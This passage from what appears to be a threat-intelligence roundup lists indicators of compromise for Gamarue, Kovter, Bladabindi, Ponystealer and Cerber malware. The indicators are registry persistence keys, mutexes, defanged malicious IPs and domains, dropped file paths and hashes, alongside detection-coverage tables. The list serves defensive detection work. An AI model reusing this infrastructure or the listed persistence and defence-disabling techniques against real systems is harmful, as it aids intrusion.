74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca 7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6 7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65 8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69 89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935 8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-komG9sMxszw/XkbkeNevidI/AAAAAAAADSc/kg9MJFg4Od4ZtqllEEqpWqFwGxDCzlNCgCLcBGAsYHQ/s1600/8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Gamarue-7580018-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Sidebars ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: twunk_16.exe ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Taskman ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update Manager ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES \nValue Name: Number ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\NOTEPAD \nValue Name: Body ` | 1 \nMutexes | Occurrences \n---|--- \n`alFSVWJB` | 2 \n`PuredairyBB9` | 1 \n`PuredairyBB10` | 1 \n`PuredairyBB2` | 1 \n`PuredairyBB4` | 1 \n`PuredairyBB8` | 1 \n`PuredairyBB7` | 1 \n`PuredairyBB6` | 1 \n`PuredairyBB15` | 1 \n`PuredairyBB14` | 1 \n`PuredairyBB13` | 1 \n`PuredairyBB12` | 1 \n`PSPSndkvsdvd0199201` | 1 \n`PuredairyBB1` | 1 \n`PuredairyBB5` | 1 \n`PuredairyBB3` | 1 \n`PuredairyBB16` | 1 \n`PuredairyBB17` | 1 \n`PuredairyBB18` | 1 \n`PuredairyBB22` | 1 \n`PuredairyBB20` | 1 \n`PuredairyBB21` | 1 \n`PuredairyBB19` | 1 \n`PuredairyBB29` | 1 \n`PuredairyBB31` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 2 \n`23[.]253[.]126[.]58` | 2 \n`184[.]105[.]192[.]2` | 6 \n`104[.]239[.]157[.]210` | 2 \n`104[.]42[.]225[.]122` | 8 \n`40[.]90[.]247[.]210` | 5 \n`40[.]91[.]124[.]111` | 4 \n`20[.]45[.]1[.]107` | 9 \n`109[.]120[.]180[.]29` | 2 \n`94[.]102[.]52[.]19` | 1 \n`217[.]23[.]8[.]142` | 1 \n`109[.]236[.]86[.]119` | 1 \n`93[.]190[.]140[.]141` | 1 \n`108[.]59[.]2[.]221` | 1 \n`109[.]236[.]83[.]12` | 1 \n`80[.]82[.]65[.]207` | 1 \n`217[.]23[.]3[.]105` | 1 \n`217[.]23[.]4[.]220` | 1 \n`93[.]190[.]140[.]113` | 1 \n`217[.]23[.]9[.]104` | 1 \n`93[.]190[.]142[.]191` | 1 \n`94[.]102[.]51[.]231` | 1 \n`217[.]23[.]7[.]3` | 1 \n`80[.]82[.]65[.]199` | 1 \n`109[.]236[.]86[.]27` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`europe[.]pool[.]ntp[.]org` | 9 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 9 \n`and10[.]uzuzuseubumaandro[.]com` | 1 \n`powerrembo[.]ru` | 2 \n`and4[.]junglebeariwtc1[.]com` | 1 \n`faumoussuperstars[.]ru` | 2 \n`martivitapoint[.]info` | 1 \n`and10[.]uzuzuseubumaandro1[.]com` | 1 \n`spotxte[.]com` | 1 \n`nutqauytva8azxd[.]com` | 2 \n`nutqauytva100azxd[.]com` | 2 \n`nutqauytva2azxd[.]com` | 2 \n`nutqauytva10azxd[.]com` | 2 \n`nutqauytva6azxd[.]com` | 2 \n`nutqauytva11azxd[.]com` | 2 \n`nutqauytva3azxd[.]com` | 2 \n`nutqauytva9azxd[.]com` | 2 \n`nutqauytva7azxd[.]com` | 2 \n`nutqauytva5azxd[.]com` | 2 \n`nutqauytva4azxd[.]com` | 2 \n`109[.]120[.]180[.]29` | 1 \n`vedivenivici[.]ml` | 2 \n`delvernet[.]info` | 2 \n`otter[.]pw` | 2 \n`oingee[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\Documents and Settings\\All Users\\mslkrru.exe` | 9 \n`%APPDATA%\\WindowsUpdate` | 1 \n`\\RECYCLER` | 7 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-18611771` | 5 \n`\\TEMP\\C\\UPDATE` | 1 \n`%APPDATA%\\WindowsUpdate\\MSupdate.exe` | 1 \n`%APPDATA%\\alFSVWJB` | 2 \n`%ProgramData%\\msodtyzm.exe` | 11 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-1861771` | 2 \n`%ProgramData%\\~` | 11 \n`%APPDATA%\\alFSVWJB\\twunk_16.exe` | 1 \n`%APPDATA%\\winamfes.exe` | 2 \n`%APPDATA%\\alFSVWJB\\splwow64.exe` | 1 \n`%TEMP%\\-1631195624.bat` | 1 \n`%TEMP%\\115828.bat` | 1 \n`%APPDATA%\\alFSVWJB\\winhlp32.exe` | 1 \n \n#### File Hashes\n\n` 0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca 1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4 1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314 1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6 20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef 2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88 36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f 3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e 5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41 68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470 693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8 6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54 70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae 7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855 7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb 82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce 87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8 966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2 98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6 aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320 bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049 d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6 d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54 da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-essWD6jQn98/XkbkvQMAvWI/AAAAAAAADSo/bh8oOsTllLUEQwUn1IophA4XDimJYhOyACLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-XUwmAjmy9ew/XkbkzJwdRGI/AAAAAAAADSs/xPUmGpebw9w7DDIYT8tr5woLymKe-hbrQCLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-pnZSPvSBJmk/Xkbk33ih9QI/AAAAAAAADSw/bO3pg221ueYN8fpJxUqsIARE5fAeurJjACLcBGAsYHQ/s1600/1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Kovter-7581113-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eed5bf47 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: edfc5b63 ` | 15 \n`<HKCR>\\C3B61 ` | 15 \n`<HKCR>\\C3B61\\SHELL ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN\\COMMAND ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8567f942 ` | 15 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 15 \n`A83BAA13F950654C` | 15 \n`Global\\7A7146875A8CDE1E` | 15 \n`B3E8F6F86CDD9D8B` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]59[.]22[.]216` | 1 \n`203[.]220[.]231[.]209` | 1 \n`35[.]30[.]2[.]211` | 1 \n`65[.]168[.]33[.]91` | 1 \n`65[.]23[.]68[.]193` | 1 \n`8[.]111[.]224[.]146` | 1 \n`190[.]95[.]112[.]80` | 1 \n`17[.]163[.]64[.]9` | 1 \n`75[.]177[.]69[.]90` | 1 \n`166[.]105[.]213[.]36` | 1 \n`214[.]63[.]237[.]80` | 1 \n`36[.]91[.]76[.]70` | 1 \n`106[.]70[.]177[.]221` | 1 \n`16[.]191[.]214[.]15` | 1 \n`58[.]13[.]27[.]49` | 1 \n`192[.]86[.]250[.]64` | 1 \n`126[.]167[.]218[.]58` | 1 \n`15[.]150[.]185[.]79` | 1 \n`136[.]59[.]133[.]35` | 1 \n`14[.]24[.]198[.]67` | 1 \n`60[.]255[.]136[.]37` | 1 \n`35[.]118[.]226[.]214` | 1 \n`39[.]29[.]235[.]49` | 1 \n`154[.]111[.]27[.]104` | 1 \n`166[.]82[.]242[.]42` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]litespeedtech[.]com` | 1 \n`schema[.]org` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`pinterest[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`bugs[.]debian[.]org` | 1 \n`www[.]anrdoezrs[.]net` | 1 \n`shareasale[.]com` | 1 \n`help[.]smartertools[.]com` | 1 \n`www[.]smartertools[.]com` | 1 \n`www[.]pntrs[.]com` | 1 \n`cdn10[.]bigcommerce[.]com` | 1 \n`cowgirldelight[.]com` | 1 \n`lppool[.]catalogsites[.]net` | 1 \n`www[.]rods[.]com` | 1 \n`checkspressions[.]com` | 1 \n`www[.]womensbootshop[.]com` | 1 \n`www[.]cssigniter[.]com` | 1 \n`passets-cdn[.]pinterest[.]com` | 1 \n`www[.]pntra[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\4dd3c` | 15 \n`%LOCALAPPDATA%\\4dd3c\\519d0.bat` | 15 \n`%LOCALAPPDATA%\\4dd3c\\8e986.8ca9d7` | 15 \n`%LOCALAPPDATA%\\4dd3c\\d95ad.lnk` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\91b4e.lnk` | 15 \n`%APPDATA%\\b08d6` | 15 \n`%APPDATA%\\b08d6\\0b3c0.8ca9d7` | 15 \n \n#### File Hashes\n\n` 0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c 127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a 2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431 2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9 30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2 37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394 7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717 797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c 7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27 82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17 ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037 b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806 b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110 cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rHmOGYUnn3s/XkblI9uCPbI/AAAAAAAADTA/hTPnFRS2Is41M-ewgT-M8IsL59hsFItgwCLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-7yDofoCL-Fs/XkblNUumwAI/AAAAAAAADTE/BxQtrDXc0y4VUTtwioNP4Kxhg7C8kP9NACLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### PUA.Win.Trojan.Bladabindi-7581164-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD \nValue Name: [kl] ` | 17 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 17 \n`7261d3f24ae2c8dcaf22faf7fcf1cafd` | 17 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`shareefboy[.]ddns[.]net` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`%TEMP%\\server.exe` | 17 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`\\423002248.exex (copy)` | 1 \n`%TEMP%\\server.exex (copy)` | 17 \n \n#### File Hashes\n\n` 00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5 245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714 285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf 29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c 2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd 344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4 388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7 66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e 7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28 8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5 aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757 c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88 d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62 fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-W5F1RN8Tm7I/Xkblcv7o31I/AAAAAAAADTM/tWcW6CL0BuE_G9-sU9ew3Pe1cB9SjFz-wCLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ySnPmdkZ4R0/XkblhtE_bmI/AAAAAAAADTU/SW1w7x44-dYrOt3fVXzasbj_YktfYNZnACLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Ponystealer-7581286-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 17 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`194[.]4[.]56[.]252` | 17 \n`212[.]129[.]7[.]131` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`myp0nysite[.]ru` | 17 \n`streetcode3[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\filename.vbe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\filename.vbe` | 17 \n`%APPDATA%\\subfolder` | 17 \n`%APPDATA%\\subfolder\\filename.bat` | 17 \n`%TEMP%\\811953.bat` | 1 \n`%TEMP%\\-1509909074.bat` | 1 \n \n#### File Hashes\n\n` 13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5 182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0 2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1 2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772 3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43 5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee 73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6 8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7 8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a 955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d 9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0 ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6 d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174 e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4 e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZzGH1lfQaOM/Xkbl1DWh3cI/AAAAAAAADTg/5TealMCAQCwGV1Zr6ljcNU2rdZHiVw1ZACLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-61hbPOtrq-I/Xkbl5sOFfsI/AAAAAAAADTk/0gll55PTzw8pVUvAL9kP9MMil-bAEgOKwCLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-fPRNlwGrXtI/Xkbl_YvhU1I/AAAAAAAADTo/bpbeNHbR40kZwAtGk5U5wxxoMD39ioBIACLcBGAsYHQ/s1600/816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7582361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 7 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228} ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`13[.]107[.]21[.]200` | 2 \n`204[.]79[.]197[.]200` | 3 \n`15[.]49[.]2[.]0/27` | 8 \n`122[.]1[.]13[.]0/27` | 8 \n`194[.]165[.]17[.]0/25` | 8 \n`95[.]213[.]195[.]123` | 2 \n`91[.]142[.]90[.]61` | 7 \n`31[.]41[.]47[.]50` | 5 \n`31[.]41[.]47[.]31` | 1 \n`195[.]19[.]192[.]99` | 2 